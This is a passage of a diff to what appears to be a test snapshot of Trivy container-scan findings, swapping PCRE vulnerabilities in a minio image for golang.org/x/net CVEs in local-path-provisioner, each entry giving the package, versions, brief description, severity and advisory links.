"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5809.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", + "value": "https://pkg.go.dev/vuln/GO-2021-0356", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-1", + "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-2", + "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1586", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "10.36-2+deb11u1", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1587", - "installedVersion": "10.36-2", - "packageName": "libpcre2-8-0", + "fixedVersion": "0.0.0-20210520170846-37e1c6afe023", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-33194", + "installedVersion": "v0.0.0-20201021035429-f5854403a974", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-1587", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", - "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", - "https://linux.oracle.com/cve/CVE-2022-1587.html", - "https://linux.oracle.com/errata/ELSA-2022-5251.html", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", - "https://security.netapp.com/advisory/ntap-20221028-0009/", - "https://ubuntu.com/security/notices/USN-5627-1", - "https://ubuntu.com/security/notices/USN-5627-2", - "https://www.cve.org/CVERecord?id=CVE-2022-1587", + "https://access.redhat.com/security/cve/CVE-2021-33194", + "https://github.com/advisories/GHSA-83g2-8m93-v3w7", + "https://github.com/golang/net/commit/37e1c6afe02340126705deced573a85ab75209d7", + "https://go.dev/cl/311090", + "https://go.dev/issue/46288", + "https://go.googlesource.com/net/+/37e1c6afe02340126705deced573a85ab75209d7", + "https://groups.google.com/g/golang-announce/c/wPunbCPkWUg", + "https://groups.google.com/g/golang-dev/c/28x0nthP-c8/m/KqWVTjsnBAAJ", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4CHKSFMHZVOBCZSSVRE3UEYNKARTBMTM/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33194", + "https://pkg.go.dev/vuln/GO-2021-0238", + "https://www.cve.org/CVERecord?id=CVE-2021-33194", ], }, "category": "Vulnerability", - "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the get_recurse_data_length() function of the pcre2_jit_compile.c file. This issue affects recursions in JIT-compiled regular expressions caused by duplicate data transfers.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "golang.org/x/net before v0.0.0-20210520170846-37e1c6afe023 allows attackers to cause a denial of service (infinite loop) via crafted ParseFragment input.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "pcre2: Out-of-bounds read in get_recurse_data_length in pcre2_jit_compile.c", + "name": "golang: x/net/html: infinite loop in ParseFragment", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1587", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1587", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", - }, - { - "type": "URL", - "value": "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", + "value": "https://avd.aquasec.com/nvd/cve-2021-33194", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1587.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-33194", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5251.html", + "value": "https://github.com/advisories/GHSA-83g2-8m93-v3w7", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "value": "https://github.com/golang/net/commit/37e1c6afe02340126705deced573a85ab75209d7", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "value": "https://go.dev/cl/311090", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "value": "https://go.dev/issue/46288", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "value": "https://go.googlesource.com/net/+/37e1c6afe02340126705deced573a85ab75209d7", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "value": "https://groups.google.com/g/golang-announce/c/wPunbCPkWUg", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", + "value": "https://groups.google.com/g/golang-dev/c/28x0nthP-c8/m/KqWVTjsnBAAJ", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4CHKSFMHZVOBCZSSVRE3UEYNKARTBMTM/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33194", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-2", + "value": "https://pkg.go.dev/vuln/GO-2021-0238", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1587", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33194", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-11164", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", + "fixedVersion": "0.0.0-20211209124913-491a49abca63", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-44716", + "installedVersion": "v0.0.0-20201021035429-f5854403a974", + "packageName": "golang.org/x/net", "references": [ - "http://openwall.com/lists/oss-security/2017/07/11/3", - "http://www.openwall.com/lists/oss-security/2023/04/11/1", - "http://www.openwall.com/lists/oss-security/2023/04/12/1", - "http://www.securityfocus.com/bid/99575", - "https://access.redhat.com/security/cve/CVE-2017-11164", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", - "https://www.cve.org/CVERecord?id=CVE-2017-11164", + "https://access.redhat.com/security/cve/CVE-2021-44716", + "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "https://github.com/golang/go/issues/50058", + "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "https://go.dev/cl/369794", + "https://go.dev/issue/50058", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "https://linux.oracle.com/cve/CVE-2021-44716.html", + "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "https://pkg.go.dev/vuln/GO-2022-0288", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220121-0002/", + "https://www.cve.org/CVERecord?id=CVE-2021-44716", ], }, "category": "Vulnerability", - "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "pcre: OP_KETRMAX feature in the match function in pcre_exec.c", + "name": "golang: net/http: limit growth of header canonicalization cache", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-11164", + "value": "https://avd.aquasec.com/nvd/cve-2021-44716", }, { "type": "URL", - "value": "http://openwall.com/lists/oss-security/2017/07/11/3", + "value": "https://access.redhat.com/security/cve/CVE-2021-44716", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/11/1", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/12/1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/99575", + "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-11164", + "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", + "value": "https://github.com/golang/go/issues/50058", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", + "value": "https://go.dev/cl/369794", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-11164", + "value": "https://go.dev/issue/50058", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-16231", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", - "references": [ - "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", - "http://seclists.org/fulldisclosure/2018/Dec/33", - "http://www.openwall.com/lists/oss-security/2017/11/01/11", - "http://www.openwall.com/lists/oss-security/2017/11/01/3", - "http://www.openwall.com/lists/oss-security/2017/11/01/7", - "http://www.openwall.com/lists/oss-security/2017/11/01/8", - "http://www.securityfocus.com/bid/101688", - "https://access.redhat.com/security/cve/CVE-2017-16231", - "https://bugs.exim.org/show_bug.cgi?id=2047", - "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", - "https://www.cve.org/CVERecord?id=CVE-2017-16231", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "pcre: self-recursive call in match() in pcre_exec.c leads to denial of service", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-16231", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, { "type": "URL", - "value": "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2018/Dec/33", + "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/11", + "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/3", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/7", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/8", + "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/101688", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-16231", + "value": "https://pkg.go.dev/vuln/GO-2022-0288", }, { "type": "URL", - "value": "https://bugs.exim.org/show_bug.cgi?id=2047", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-16231", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-7245", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20201021035429-f5854403a974", + "packageName": "golang.org/x/net", "references": [ - "http://www.securityfocus.com/bid/97067", - "https://access.redhat.com/errata/RHSA-2018:2486", - "https://access.redhat.com/security/cve/CVE-2017-7245", - "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", - "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", - "https://security.gentoo.org/glsa/201710-25", - "https://www.cve.org/CVERecord?id=CVE-2017-7245", + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", ], }, "category": "Vulnerability", - "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", + "name": "handle server errors after sending GOAWAY", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-7245", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/97067", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2018:2486", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-7245", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201710-25", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-7245", + "value": "https://bugzilla.redhat.com/2107388", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-7246", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", - "references": [ - "http://www.securityfocus.com/bid/97067", - "https://access.redhat.com/errata/RHSA-2018:2486", - "https://access.redhat.com/security/cve/CVE-2017-7246", - "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", - "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", - "https://security.gentoo.org/glsa/201710-25", - "https://www.cve.org/CVERecord?id=CVE-2017-7246", - ], - }, - "category": "Vulnerability", - "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-7246", + "value": "https://bugzilla.redhat.com/2113814", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/97067", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2018:2486", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-7246", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201710-25", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-7246", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-20838", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", - "references": [ - "http://seclists.org/fulldisclosure/2020/Dec/32", - "http://seclists.org/fulldisclosure/2021/Feb/14", - "https://access.redhat.com/security/cve/CVE-2019-20838", - "https://bugs.gentoo.org/717920", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", - "https://errata.almalinux.org/8/ALSA-2021-4373.html", - "https://errata.rockylinux.org/RLSA-2021:4373", - "https://linux.oracle.com/cve/CVE-2019-20838.html", - "https://linux.oracle.com/errata/ELSA-2021-4373.html", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", - "https://support.apple.com/kb/HT211931", - "https://support.apple.com/kb/HT212147", - "https://ubuntu.com/security/notices/USN-5425-1", - "https://www.cve.org/CVERecord?id=CVE-2019-20838", - "https://www.pcre.org/original/changelog.txt", - ], - }, - "category": "Vulnerability", - "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-20838", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2020/Dec/32", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/Feb/14", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-20838", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "https://bugs.gentoo.org/717920", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4373", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-20838.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT211931", + "value": 